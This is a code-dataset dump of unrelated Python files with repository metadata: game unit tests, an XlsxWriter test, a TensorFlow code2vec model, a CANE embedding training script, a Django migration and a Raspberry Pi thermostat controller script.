] | 1 | 2020-04-02T11:51:20.000Z | 2020-04-02T11:51:20.000Z | src/the_tale/the_tale/game/bills/tests/test_place_modifier.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | null | null | null | src/the_tale/the_tale/game/bills/tests/test_place_modifier.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | null | null | null |
import smart_imports
smart_imports.all()
class PlaceModifierTests(helpers.BaseTestPrototypes):
def setUp(self):
super(PlaceModifierTests, self).setUp()
self.place = self.place1
self.place_2 = self.place2
self.bill_data = bills.place_change_modifier.PlaceModifier(place_id=self.place.id,
modifier_id=places_modifiers.CITY_MODIFIERS.TRADE_CENTER,
modifier_name=places_modifiers.CITY_MODIFIERS.TRADE_CENTER.text,
old_modifier_name=None)
self.bill = prototypes.BillPrototype.create(self.account1, 'bill-1-caption', self.bill_data, chronicle_on_accepted='chronicle-on-accepted')
def test_create(self):
self.assertEqual(self.bill.data.place_id, self.place.id)
self.assertTrue(self.bill.data.modifier_id.is_TRADE_CENTER)
self.assertEqual(self.bill.data.modifier_name, places_modifiers.CITY_MODIFIERS.TRADE_CENTER.text)
self.assertEqual(self.bill.data.old_modifier_name, None)
def test_actors(self):
self.assertEqual([id(a) for a in self.bill_data.actors], [id(self.place)])
def test_update(self):
self.place_2.attrs.modifier_craft_center = 100
form = self.bill.data.get_user_form_update(post={'caption': 'new-caption',
'place': self.place_2.id,
'chronicle_on_accepted': 'chronicle-on-accepted',
'new_modifier': places_modifiers.CITY_MODIFIERS.CRAFT_CENTER})
self.assertTrue(form.is_valid())
self.bill.update(form)
self.bill = prototypes.BillPrototype.get_by_id(self.bill.id)
self.assertEqual(self.bill.data.place_id, self.place_2.id)
self.assertTrue(self.bill.data.modifier_id.is_CRAFT_CENTER)
self.assertEqual(self.bill.data.modifier_name, places_modifiers.CITY_MODIFIERS.CRAFT_CENTER.text)
self.assertEqual(self.bill.data.old_modifier_name, None)
def test_success_form_validation(self):
self.place_2.attrs.modifier_craft_center = 100
form = self.bill.data.get_user_form_update(post={'caption': 'new-caption',
'chronicle_on_accepted': 'chronicle-on-accepted-2',
'place': self.place_2.id,
'new_modifier': places_modifiers.CITY_MODIFIERS.CRAFT_CENTER})
self.assertTrue(form.is_valid())
def test_not_allowed_modifier(self):
self.place_2.attrs.modifier_craft_center = 0
form = self.bill.data.get_user_form_update(post={'caption': 'new-caption',
'chronicle_on_accepted': 'chronicle-on-accepted-2',
'place': self.place_2.id,
'new_modifier': places_modifiers.CITY_MODIFIERS.CRAFT_CENTER})
self.assertFalse(form.is_valid())
@mock.patch('the_tale.game.bills.conf.settings.MIN_VOTES_PERCENT', 0.6)
@mock.patch('the_tale.game.bills.prototypes.BillPrototype.time_before_voting_end', datetime.timedelta(seconds=0))
def test_apply(self):
prototypes.VotePrototype.create(self.account2, self.bill, relations.VOTE_TYPE.AGAINST)
prototypes.VotePrototype.create(self.account3, self.bill, relations.VOTE_TYPE.FOR)
data = self.bill.user_form_initials
data['approved'] = True
form = self.bill.data.get_moderator_form_update(data)
self.assertTrue(form.is_valid())
self.bill.update_by_moderator(form)
self.assertTrue(self.bill.apply())
bill = prototypes.BillPrototype.get_by_id(self.bill.id)
self.assertTrue(bill.state.is_ACCEPTED)
self.assertTrue(self.place._modifier.is_TRADE_CENTER)
@mock.patch('the_tale.game.bills.conf.settings.MIN_VOTES_PERCENT', 0.6)
@mock.patch('the_tale.game.bills.prototypes.BillPrototype.time_before_voting_end', datetime.timedelta(seconds=0))
def test_has_meaning__duplicate_modifier(self):
prototypes.VotePrototype.create(self.account2, self.bill, relations.VOTE_TYPE.AGAINST)
prototypes.VotePrototype.create(self.account3, self.bill, relations.VOTE_TYPE.FOR)
data = self.bill.user_form_initials
data['approved'] = True
form = self.bill.data.get_moderator_form_update(data)
self.assertTrue(form.is_valid())
self.bill.update_by_moderator(form)
self.bill.data.place.set_modifier(self.bill.data.modifier_id)
places_logic.save_place(self.bill.data.place)
self.assertFalse(self.bill.has_meaning())
| 48.539216 | 147 | 0.631994 |
07b7b942cb57cd366254180d58e0d1a7c2818c9c | 799 | py | Python | xlsxwriter/test/comparison/test_textbox09.py | adgear/XlsxWriter | 79bcaad28d57ac29038b1c74bccc6d611b7a385e | [
"BSD-2-Clause-FreeBSD"
] | 2 | 2019-07-25T06:08:09.000Z | 2019-11-01T02:33:56.000Z | xlsxwriter/test/comparison/test_textbox09.py | adgear/XlsxWriter | 79bcaad28d57ac29038b1c74bccc6d611b7a385e | [
"BSD-2-Clause-FreeBSD"
] | 13 | 2019-07-14T00:29:05.000Z | 2019-11-26T06:16:46.000Z | xlsxwriter/test/comparison/test_textbox09.py | adgear/XlsxWriter | 79bcaad28d57ac29038b1c74bccc6d611b7a385e | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('textbox09.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with textbox(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.insert_textbox('E9', 'This\nis\n\nsome long text')
workbook.close()
self.assertExcelEqual()
| 23.5 | 79 | 0.61577 |
d2e7fec343905e8befe630b479dab9f8b21a31f8 | 27,695 | py | Python | model.py | ZhaoYi1031/code2vec | 40553fcc14d3bd93995c73aefdbdefa2e0e66b98 | [
"MIT"
] | null | null | null | model.py | ZhaoYi1031/code2vec | 40553fcc14d3bd93995c73aefdbdefa2e0e66b98 | [
"MIT"
] | null | null | null | model.py | ZhaoYi1031/code2vec | 40553fcc14d3bd93995c73aefdbdefa2e0e66b98 | [
"MIT"
] | null | null | null | import tensorflow as tf
import PathContextReader
import numpy as np
import time
import pickle
from common import common, VocabType
class Model:
topk = 10
num_batches_to_log = 100
def __init__(self, config):
# 模型的主要参数都写在这里
self.config = config
self.sess = tf.Session()
self.eval_data_lines = None
self.eval_queue = None
self.predict_queue = None
self.eval_placeholder = None
self.predict_placeholder = None
self.eval_top_words_op, self.eval_top_values_op, self.eval_original_names_op, self.eval_code_vectors = None, None, None, None
self.predict_top_words_op, self.predict_top_values_op, self.predict_original_names_op = None, None, None
if config.TRAIN_PATH:
with open('{}.dict.c2v'.format(config.TRAIN_PATH), 'rb') as file:
word_to_count = pickle.load(file)
path_to_count = pickle.load(file)
target_to_count = pickle.load(file)
num_training_examples = pickle.load(file)
self.config.NUM_EXAMPLES = num_training_examples
print('Dictionaries loaded.')
if config.LOAD_PATH:
self.load_model(sess=None)
else:
self.word_to_index, self.index_to_word, self.word_vocab_size = \
common.load_vocab_from_dict(word_to_count, config.WORDS_VOCAB_SIZE, start_from=1)
print('Loaded word vocab. size: %d' % self.word_vocab_size)
# 啊,这个此表是预先定义好的
# 这个是source的词表
self.target_word_to_index, self.index_to_target_word, self.target_word_vocab_size = \
common.load_vocab_from_dict(target_to_count, config.TARGET_VOCAB_SIZE,
start_from=1)
print('Loaded target word vocab. size: %d' % self.target_word_vocab_size)
self.path_to_index, self.index_to_path, self.path_vocab_size = \
common.load_vocab_from_dict(path_to_count, config.PATHS_VOCAB_SIZE,
start_from=1)
print('Loaded paths vocab. size: %d' % self.path_vocab_size)
self.create_index_to_target_word_map()
def create_index_to_target_word_map(self):
self.index_to_target_word_table = tf.contrib.lookup.HashTable(
tf.contrib.lookup.KeyValueTensorInitializer(list(self.index_to_target_word.keys()),
list(self.index_to_target_word.values()),
key_dtype=tf.int64, value_dtype=tf.string),
default_value=tf.constant(common.noSuchWord, dtype=tf.string))
def close_session(self):
self.sess.close()
def train(self):
print('Starting training')
start_time = time.time()
batch_num = 0
sum_loss = 0
multi_batch_start_time = time.time()
num_batches_to_evaluate = max(int(
self.config.NUM_EXAMPLES / self.config.BATCH_SIZE * self.config.SAVE_EVERY_EPOCHS), 1)
self.queue_thread = PathContextReader.PathContextReader(word_to_index=self.word_to_index,
path_to_index=self.path_to_index,
target_word_to_index=self.target_word_to_index,
config=self.config)
optimizer, train_loss = self.build_training_graph(self.queue_thread.input_tensors())
# !
self.saver = tf.train.Saver(max_to_keep=self.config.MAX_TO_KEEP)
self.initialize_session_variables(self.sess)
print('Initalized variables')
if self.config.LOAD_PATH:
self.load_model(self.sess)
with self.queue_thread.start(self.sess):
time.sleep(1)
print('Started reader...')
try:
while True:
batch_num += 1
_, batch_loss = self.sess.run([optimizer, train_loss])
#在这个里面去run了,
sum_loss += batch_loss
# loss是所有batch的loss的和
if batch_num % self.num_batches_to_log == 0:
self.trace(sum_loss, batch_num, multi_batch_start_time)
print('Number of waiting examples in queue: %d' % self.sess.run(
"shuffle_batch/random_shuffle_queue_Size:0"))
sum_loss = 0
multi_batch_start_time = time.time()
if batch_num % num_batches_to_evaluate == 0:
epoch_num = int((batch_num / num_batches_to_evaluate) * self.config.SAVE_EVERY_EPOCHS)
save_target = self.config.SAVE_PATH + '_iter' + str(epoch_num)
self.save_model(self.sess, save_target)
print('Saved after %d epochs in: %s' % (epoch_num, save_target))
results, precision, recall, f1 = self.evaluate()
print('Accuracy after %d epochs: %s' % (epoch_num, results[:5]))
print('After ' + str(epoch_num) + ' epochs: Precision: ' + str(precision) + ', recall: ' + str(
recall) + ', F1: ' + str(f1))
except tf.errors.OutOfRangeError:
print('Done training')
if self.config.SAVE_PATH:
self.save_model(self.sess, self.config.SAVE_PATH)
print('Model saved in file: %s' % self.config.SAVE_PATH)
elapsed = int(time.time() - start_time)
print("Training time: %sH:%sM:%sS\n" % ((elapsed // 60 // 60), (elapsed // 60) % 60, elapsed % 60))
def trace(self, sum_loss, batch_num, multi_batch_start_time):
multi_batch_elapsed = time.time() - multi_batch_start_time
avg_loss = sum_loss / (self.num_batches_to_log * self.config.BATCH_SIZE)
print('Average loss at batch %d: %f, \tthroughput: %d samples/sec' % (batch_num, avg_loss,
self.config.BATCH_SIZE * self.num_batches_to_log / (
multi_batch_elapsed if multi_batch_elapsed > 0 else 1)))
def evaluate(self):
eval_start_time = time.time()
if self.eval_queue is None:
self.eval_queue = PathContextReader.PathContextReader(word_to_index=self.word_to_index,
path_to_index=self.path_to_index,
target_word_to_index=self.target_word_to_index,
config=self.config, is_evaluating=True)
# 读路径上下文
self.eval_placeholder = self.eval_queue.get_input_placeholder()
self.eval_top_words_op, self.eval_top_values_op, self.eval_original_names_op, _, _, _, _, self.eval_code_vectors = \
self.build_test_graph(self.eval_queue.get_filtered_batches())
self.saver = tf.train.Saver()
if self.config.LOAD_PATH and not self.config.TRAIN_PATH:
self.initialize_session_variables(self.sess)
self.load_model(self.sess)
if self.config.RELEASE:
release_name = self.config.LOAD_PATH + '.release'
print('Releasing model, output model: %s' % release_name )
self.saver.save(self.sess, release_name )
return None
if self.eval_data_lines is None:
print('Loading test data from: ' + self.config.TEST_PATH)
self.eval_data_lines = common.load_file_lines(self.config.TEST_PATH)
print('Done loading test data')
with open('log.txt', 'w') as output_file:
#print("output_file(ohazyi)=", output_file)
if self.config.EXPORT_CODE_VECTORS:
code_vectors_file = open(self.config.TEST_PATH + '.vectors', 'w')
#print("code_vector_file(ohazyi) = ", code_vectors_file)
num_correct_predictions = np.zeros(self.topk)
total_predictions = 0
total_prediction_batches = 0
true_positive, false_positive, false_negative = 0, 0, 0
start_time = time.time()
for batch in common.split_to_batches(self.eval_data_lines, self.config.TEST_BATCH_SIZE):
top_words, top_scores, original_names, code_vectors = self.sess.run(
[self.eval_top_words_op, self.eval_top_values_op, self.eval_original_names_op, self.eval_code_vectors],
feed_dict={self.eval_placeholder: batch})
top_words, original_names = common.binary_to_string_matrix(top_words), common.binary_to_string_matrix(
original_names)
# Flatten original names from [[]] to []
original_names = [w for l in original_names for w in l]
num_correct_predictions = self.update_correct_predictions(num_correct_predictions, output_file,
zip(original_names, top_words))
true_positive, false_positive, false_negative = self.update_per_subtoken_statistics(
zip(original_names, top_words),
true_positive, false_positive, false_negative)
total_predictions += len(original_names)
total_prediction_batches += 1
if self.config.EXPORT_CODE_VECTORS:
self.write_code_vectors(code_vectors_file, code_vectors)
if total_prediction_batches % self.num_batches_to_log == 0:
elapsed = time.time() - start_time
# start_time = time.time()
self.trace_evaluation(output_file, num_correct_predictions, total_predictions, elapsed, len(self.eval_data_lines))
print('Done testing, epoch reached')
output_file.write(str(num_correct_predictions / total_predictions) + '\n')
if self.config.EXPORT_CODE_VECTORS:
code_vectors_file.close()
elapsed = int(time.time() - eval_start_time)
precision, recall, f1 = self.calculate_results(true_positive, false_positive, false_negative)
print("Evaluation time: %sH:%sM:%sS" % ((elapsed // 60 // 60), (elapsed // 60) % 60, elapsed % 60))
del self.eval_data_lines
self.eval_data_lines = None
return num_correct_predictions / total_predictions, precision, recall, f1
def write_code_vectors(self, file, code_vectors):
for vec in code_vectors:
file.write(' '.join(map(str, vec)) + '\n')
def update_per_subtoken_statistics(self, results, true_positive, false_positive, false_negative):
for original_name, top_words in results:
prediction = common.filter_impossible_names(top_words)[0]
original_subtokens = common.get_subtokens(original_name)
predicted_subtokens = common.get_subtokens(prediction)
for subtok in predicted_subtokens:
if subtok in original_subtokens:
true_positive += 1
else:
false_positive += 1
for subtok in original_subtokens:
if not subtok in predicted_subtokens:
false_negative += 1
return true_positive, false_positive, false_negative
@staticmethod
def calculate_results(true_positive, false_positive, false_negative):
precision = true_positive / (true_positive + false_positive)
recall = true_positive / (true_positive + false_negative)
f1 = 2 * precision * recall / (precision + recall)
return precision, recall, f1
@staticmethod
def trace_evaluation(output_file, correct_predictions, total_predictions, elapsed, total_examples):
state_message = 'Evaluated %d/%d examples...' % (total_predictions, total_examples)
throughput_message = "Prediction throughput: %d samples/sec" % int(total_predictions / (elapsed if elapsed > 0 else 1))
print(state_message)
print(throughput_message)
def update_correct_predictions(self, num_correct_predictions, output_file, results):
for original_name, top_words in results:
normalized_original_name = common.normalize_word(original_name)
predicted_something = False
for i, predicted_word in enumerate(common.filter_impossible_names(top_words)):
if i == 0:
output_file.write('Original: ' + original_name + ', predicted 1st: ' + predicted_word + '\n')
predicted_something = True
normalized_suggestion = common.normalize_word(predicted_word)
if normalized_original_name == normalized_suggestion:
output_file.write('\t\t predicted correctly at rank: ' + str(i + 1) + '\n')
for j in range(i, self.topk):
num_correct_predictions[j] += 1
break
if not predicted_something:
output_file.write('No results for predicting: ' + original_name)
return num_correct_predictions
def build_training_graph(self, input_tensors):
words_input, source_input, path_input, target_input, valid_mask = input_tensors # (batch, 1), (batch, max_contexts)
with tf.variable_scope('model'):
words_vocab = tf.get_variable('WORDS_VOCAB', shape=(self.word_vocab_size + 1, self.config.EMBEDDINGS_SIZE),
dtype=tf.float32,
initializer=tf.contrib.layers.variance_scaling_initializer(factor=1.0,
mode='FAN_OUT',
uniform=True))
target_words_vocab = tf.get_variable('TARGET_WORDS_VOCAB',
shape=(
self.target_word_vocab_size + 1, self.config.EMBEDDINGS_SIZE * 3),
dtype=tf.float32,
initializer=tf.contrib.layers.variance_scaling_initializer(factor=1.0,
mode='FAN_OUT',
uniform=True))
# 目标单词
attention_param = tf.get_variable('ATTENTION',
shape=(self.config.EMBEDDINGS_SIZE * 3, 1), dtype=tf.float32)
# 权重的参数
paths_vocab = tf.get_variable('PATHS_VOCAB', shape=(self.path_vocab_size + 1, self.config.EMBEDDINGS_SIZE),
dtype=tf.float32,
initializer=tf.contrib.layers.variance_scaling_initializer(factor=1.0,
mode='FAN_OUT',
uniform=True))
# path的vocab是什么回事
# 这个是什么路径呀?
code_vectors, _ = self.calculate_weighted_contexts(words_vocab, paths_vocab, attention_param,
source_input, path_input, target_input,
valid_mask)
# 计算加权的向量
logits = tf.matmul(code_vectors, target_words_vocab, transpose_b=True)
batch_size = tf.to_float(tf.shape(words_input)[0])
loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=tf.reshape(words_input, [-1]),
logits=logits)) / batch_size
optimizer = tf.train.AdamOptimizer().minimize(loss)
return optimizer, loss
def calculate_weighted_contexts(self, words_vocab, paths_vocab, attention_param, source_input, path_input,
target_input, valid_mask, is_evaluating=False):
# 计算加权上下文
keep_prob1 = 0.75
max_contexts = self.config.MAX_CONTEXTS
source_word_embed = tf.nn.embedding_lookup(params=words_vocab, ids=source_input) # (batch, max_contexts, dim)
path_embed = tf.nn.embedding_lookup(params=paths_vocab, ids=path_input) # (batch, max_contexts, dim)
target_word_embed = tf.nn.embedding_lookup(params=words_vocab, ids=target_input) # (batch, max_contexts, dim)
# 3个128的向量分别去embedding一下
context_embed = tf.concat([source_word_embed, path_embed, target_word_embed],
axis=-1) # (batch, max_contexts, dim * 3)
if not is_evaluating:
context_embed = tf.nn.dropout(context_embed, keep_prob1)
flat_embed = tf.reshape(context_embed, [-1, self.config.EMBEDDINGS_SIZE * 3]) # (batch * max_contexts, dim * 3)
transform_param = tf.get_variable('TRANSFORM',
shape=(self.config.EMBEDDINGS_SIZE * 3, self.config.EMBEDDINGS_SIZE * 3),
dtype=tf.float32)
flat_embed = tf.tanh(tf.matmul(flat_embed, transform_param)) # (batch * max_contexts, dim * 3)
contexts_weights = tf.matmul(flat_embed, attention_param) # (batch * max_contexts, 1)
batched_contexts_weights = tf.reshape(contexts_weights,
[-1, max_contexts, 1]) # (batch, max_contexts, 1)
mask = tf.log(valid_mask) # (batch, max_contexts)
mask = tf.expand_dims(mask, axis=2) # (batch, max_contexts, 1)
batched_contexts_weights += mask # (batch, max_contexts, 1)
attention_weights = tf.nn.softmax(batched_contexts_weights, axis=1) # (batch, max_contexts, 1)
batched_embed = tf.reshape(flat_embed, shape=[-1, max_contexts, self.config.EMBEDDINGS_SIZE * 3])
code_vectors = tf.reduce_sum(tf.multiply(batched_embed, attention_weights),
axis=1) # (batch, dim * 3)
return code_vectors, attention_weights
def build_test_graph(self, input_tensors, normalize_scores=False):
# !
with tf.variable_scope('model', reuse=self.get_should_reuse_variables()):
words_vocab = tf.get_variable('WORDS_VOCAB', shape=(self.word_vocab_size + 1, self.config.EMBEDDINGS_SIZE),
dtype=tf.float32, trainable=False)
target_words_vocab = tf.get_variable('TARGET_WORDS_VOCAB',
shape=(
self.target_word_vocab_size + 1, self.config.EMBEDDINGS_SIZE * 3),
dtype=tf.float32, trainable=False)
attention_param = tf.get_variable('ATTENTION',
shape=(self.config.EMBEDDINGS_SIZE * 3, 1),
dtype=tf.float32, trainable=False)
paths_vocab = tf.get_variable('PATHS_VOCAB',
shape=(self.path_vocab_size + 1, self.config.EMBEDDINGS_SIZE),
dtype=tf.float32, trainable=False)
target_words_vocab = tf.transpose(target_words_vocab) # (dim * 3, target_word_vocab+1)
words_input, source_input, path_input, target_input, valid_mask, source_string, path_string, path_target_string = input_tensors # (batch, 1), (batch, max_contexts)
code_vectors, attention_weights = self.calculate_weighted_contexts(words_vocab, paths_vocab,
attention_param,
source_input, path_input,
target_input,
valid_mask, True)
scores = tf.matmul(code_vectors, target_words_vocab) # (batch, target_word_vocab+1)
topk_candidates = tf.nn.top_k(scores, k=tf.minimum(self.topk, self.target_word_vocab_size))
top_indices = tf.to_int64(topk_candidates.indices)
top_words = self.index_to_target_word_table.lookup(top_indices)
original_words = words_input
top_scores = topk_candidates.values
if normalize_scores:
top_scores = tf.nn.softmax(top_scores)
return top_words, top_scores, original_words, attention_weights, source_string, path_string, path_target_string, code_vectors
def predict(self, predict_data_lines):
if self.predict_queue is None:
self.predict_queue = PathContextReader.PathContextReader(word_to_index=self.word_to_index,
path_to_index=self.path_to_index,
target_word_to_index=self.target_word_to_index,
config=self.config, is_evaluating=True)
self.predict_placeholder = self.predict_queue.get_input_placeholder()
self.predict_top_words_op, self.predict_top_values_op, self.predict_original_names_op, \
self.attention_weights_op, self.predict_source_string, self.predict_path_string, self.predict_path_target_string, self.predict_code_vectors = \
self.build_test_graph(self.predict_queue.get_filtered_batches(), normalize_scores=True)
self.initialize_session_variables(self.sess)
self.saver = tf.train.Saver()
self.load_model(self.sess)
code_vectors = []
results = []
for batch in common.split_to_batches(predict_data_lines, 1):
top_words, top_scores, original_names, attention_weights, source_strings, path_strings, target_strings, batch_code_vectors = self.sess.run(
[self.predict_top_words_op, self.predict_top_values_op, self.predict_original_names_op,
self.attention_weights_op, self.predict_source_string, self.predict_path_string,
self.predict_path_target_string, self.predict_code_vectors],
feed_dict={self.predict_placeholder: batch})
top_words, original_names = common.binary_to_string_matrix(top_words), common.binary_to_string_matrix(
original_names)
# Flatten original names from [[]] to []
attention_per_path = self.get_attention_per_path(source_strings, path_strings, target_strings,
attention_weights)
original_names = [w for l in original_names for w in l]
results.append((original_names[0], top_words[0], top_scores[0], attention_per_path))
if self.config.EXPORT_CODE_VECTORS:
print("batch_code_vectors(ohazyi)=", batch_code_vectors)
code_vectors.append(batch_code_vectors)
if len(code_vectors) > 0:
code_vectors = np.vstack(code_vectors)
return results, code_vectors
def get_attention_per_path(self, source_strings, path_strings, target_strings, attention_weights):
attention_weights = np.squeeze(attention_weights) # (max_contexts, )
attention_per_context = {}
for source, path, target, weight in zip(source_strings, path_strings, target_strings, attention_weights):
string_triplet = (
common.binary_to_string(source), common.binary_to_string(path), common.binary_to_string(target))
attention_per_context[string_triplet] = weight
return attention_per_context
@staticmethod
def get_dictionaries_path(model_file_path):
dictionaries_save_file_name = "dictionaries.bin"
return '/'.join(model_file_path.split('/')[:-1] + [dictionaries_save_file_name])
def save_model(self, sess, path):
self.saver.save(sess, path)
with open(self.get_dictionaries_path(path), 'wb') as file:
pickle.dump(self.word_to_index, file)
pickle.dump(self.index_to_word, file)
pickle.dump(self.word_vocab_size, file)
pickle.dump(self.target_word_to_index, file)
pickle.dump(self.index_to_target_word, file)
pickle.dump(self.target_word_vocab_size, file)
pickle.dump(self.path_to_index, file)
pickle.dump(self.index_to_path, file)
pickle.dump(self.path_vocab_size, file)
def load_model(self, sess):
if not sess is None:
print('Loading model weights from: ' + self.config.LOAD_PATH)
self.saver.restore(sess, self.config.LOAD_PATH)
print('Done')
dictionaries_path = self.get_dictionaries_path(self.config.LOAD_PATH)
with open(dictionaries_path , 'rb') as file:
print('Loading model dictionaries from: %s' % dictionaries_path)
self.word_to_index = pickle.load(file)
self.index_to_word = pickle.load(file)
self.word_vocab_size = pickle.load(file)
self.target_word_to_index = pickle.load(file)
self.index_to_target_word = pickle.load(file)
self.target_word_vocab_size = pickle.load(file)
self.path_to_index = pickle.load(file)
self.index_to_path = pickle.load(file)
self.path_vocab_size = pickle.load(file)
print('Done')
def save_word2vec_format(self, dest, source):
with tf.variable_scope('model', reuse=None):
if source is VocabType.Token:
vocab_size = self.word_vocab_size
embedding_size = self.config.EMBEDDINGS_SIZE
index = self.index_to_word
var_name = 'WORDS_VOCAB'
elif source is VocabType.Target:
vocab_size = self.target_word_vocab_size
embedding_size = self.config.EMBEDDINGS_SIZE * 3
index = self.index_to_target_word
var_name = 'TARGET_WORDS_VOCAB'
else:
raise ValueError('vocab type should be VocabType.Token or VocabType.Target.')
embeddings = tf.get_variable(var_name, shape=(vocab_size + 1, embedding_size), dtype=tf.float32,
trainable=False)
self.saver = tf.train.Saver()
self.load_model(self.sess)
np_embeddings = self.sess.run(embeddings)
with open(dest, 'w') as words_file:
common.save_word2vec_file(words_file, vocab_size, embedding_size, index, np_embeddings)
@staticmethod
def initialize_session_variables(sess):
sess.run(tf.group(tf.global_variables_initializer(), tf.local_variables_initializer(), tf.tables_initializer()))
def get_should_reuse_variables(self):
if self.config.TRAIN_PATH:
return True
else:
return None
| 55.61245 | 176 | 0.583246 |
01a18ad5b2281c4cb8bd4766efa7da3aa9c46055 | 4,310 | py | Python | code/train.py | fengduqianhe/CANE-master | 4d94bbd0669ccb103292e1e1f2c51e7c7a961e54 | [
"MIT"
] | null | null | null | code/train.py | fengduqianhe/CANE-master | 4d94bbd0669ccb103292e1e1f2c51e7c7a961e54 | [
"MIT"
] | null | null | null | code/train.py | fengduqianhe/CANE-master | 4d94bbd0669ccb103292e1e1f2c51e7c7a961e54 | [
"MIT"
] | null | null | null | import numpy as np
import tensorflow as tf
from .DataSet import dataSet
from .import config
from .import cane
import random
import os
import argparse
# parser = argparse.ArgumentParser()
# parser.add_argument('--dataset', '-d')
# parser.add_argument('--rho', '-r')
# args = parser.parse_args()
def start_train(dataset):
# load data
dataset_name = dataset
graph_path = os.path.join('temp/graph.txt')
text_path = os.path.join("..", "datasets", dataset_name, 'data.txt')
data = dataSet(text_path, graph_path)
# start session
with tf.Graph().as_default():
sess = tf.Session()
with sess.as_default():
model = cane.Model(data.num_vocab, data.num_nodes, 0)
opt = tf.train.AdamOptimizer(config.lr)
train_op = opt.minimize(model.loss)
sess.run(tf.global_variables_initializer())
# training
print('start training.......')
for epoch in range(config.num_epoch):
loss_epoch = 0
batches = data.generate_batches()
h1 = 0
num_batch = len(batches)
for i in range(num_batch):
batch = batches[i]
node1, node2, node3 = zip(*batch)
node1, node2, node3 = np.array(node1), np.array(node2), np.array(node3)
text1, text2, text3 = data.text[node1], data.text[node2], data.text[node3]
feed_dict = {
model.Text_a: text1,
model.Text_b: text2,
model.Text_neg: text3,
model.Node_a: node1,
model.Node_b: node2,
model.Node_neg: node3
}
# print("batch", batch)
# print("node", node1)
# print("text1", text1)
# print("text2", text2)
# print("text3", text3)
# print("Node_neg", node3)
# run the graph
_, loss_batch = sess.run([train_op, model.loss], feed_dict=feed_dict)
loss_epoch += loss_batch
#print('batch', batch, 'loss', loss_epoch)
ta = sess.run(model.TA, feed_dict=feed_dict)
t_a= sess.run(model.T_A, feed_dict=feed_dict)
te = sess.run(model.text_embed, feed_dict=feed_dict)
text_a = sess.run(model.Text_a, feed_dict=feed_dict)
# print("ta", ta.shape)
# print("t_a", t_a.shape)
# print("te", te.shape)
# print("text_a", text_a.shape)
print('epoch: ', epoch + 1, ' loss: ', loss_epoch)
file = open('temp/embed.txt', 'wb')
batches = data.generate_batches(mode='add')
num_batch = len(batches)
embed = [[] for _ in range(data.num_nodes)]
for i in range(num_batch):
batch = batches[i]
node1, node2, node3 = zip(*batch)
node1, node2, node3 = np.array(node1), np.array(node2), np.array(node3)
text1, text2, text3 = data.text[node1], data.text[node2], data.text[node3]
feed_dict = {
model.Text_a: text1,
model.Text_b: text2,
model.Text_neg: text3,
model.Node_a: node1,
model.Node_b: node2,
model.Node_neg: node3
}
# run the graph
convA, convB, TA, TB = sess.run([model.convA, model.convB, model.N_A, model.N_B], feed_dict=feed_dict)
for i in range(config.batch_size):
em = list(TA[i])
embed[node1[i]].append(em)
em = list(TB[i])
embed[node2[i]].append(em)
for i in range(data.num_nodes):
if embed[i]:
# print embed[i]
tmp = np.sum(embed[i], axis=0) / len(embed[i])
file.write((' '.join(map(str, tmp)) + '\n').encode())
else:
file.write('\n'.encode())
| 37.155172 | 118 | 0.482599 |
bb2a893d161ec341c6c656e6e8effe2ab7e07387 | 483 | py | Python | mainapp/migrations/0002_request_dateadded.py | reyasmohammed/rescuekerala | 68ee6cd4ea7b94e04fd32c4d488bcd7a8f2d371c | [
"MIT"
] | 1 | 2018-09-22T21:08:38.000Z | 2018-09-22T21:08:38.000Z | mainapp/migrations/0002_request_dateadded.py | reyasmohammed/rescuekerala | 68ee6cd4ea7b94e04fd32c4d488bcd7a8f2d371c | [
"MIT"
] | 1 | 2018-08-18T12:00:29.000Z | 2018-08-18T12:00:29.000Z | mainapp/migrations/0002_request_dateadded.py | reyasmohammed/rescuekerala | 68ee6cd4ea7b94e04fd32c4d488bcd7a8f2d371c | [
"MIT"
] | 5 | 2019-11-07T11:34:56.000Z | 2019-11-07T11:36:00.000Z | # Generated by Django 2.1 on 2018-08-11 09:32
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='request',
name='dateadded',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
]
| 23 | 93 | 0.6294 |
4e27a288bc09805b358343501fbdd23ed7fa2e48 | 1,216 | py | Python | src/main.py | danwwagner/repurposed-thermostats | 6d63393e1754175893a0c920aca22e0966277015 | [
"MIT"
] | null | null | null | src/main.py | danwwagner/repurposed-thermostats | 6d63393e1754175893a0c920aca22e0966277015 | [
"MIT"
] | null | null | null | src/main.py | danwwagner/repurposed-thermostats | 6d63393e1754175893a0c920aca22e0966277015 | [
"MIT"
] | null | null | null | from controlcontroller import ControlController
import glob
import os
# (1) Change sensor type here
from sensor import MCP9808
# (2) Change sensor type here
# List representation for use if the system will
# contain multiple types of temperature sensors.
# Signify the temperature sensor that will
# not be averaged as an indoor reading
# This may be different on each system
# due to inconsistent naming/numbering.
excluded_sensor = "1d"
# List of reserved i2c addresses
# that are used by components
# other than temperature sensors.
# Make sure that each of the elements
# in this list are hexadecimal strings
# i.e. "1a".
reserved = ["68"]
# You must include a Python implementation that
# uses the Sensor superclass for the
# type of sensor in your system (see sensor.py)
sensor = [MCP9808(reserved, excluded_sensor)]
# Find the USB folder in the mount point
path = "/media/pi/*"
list_of_usb_names = glob.glob(path)
if len(list_of_usb_names) == 0:
directory = "/home/pi/repurposed-thermostats/src"
path = [ dir + "/R1G4sensors.csv" for dir in list_of_usb_names]
# Initialize the controller program
tent_control = ControlController(path, sensor)
# Enter the main control loop
tent_control.main()
| 25.87234 | 63 | 0.761513 |
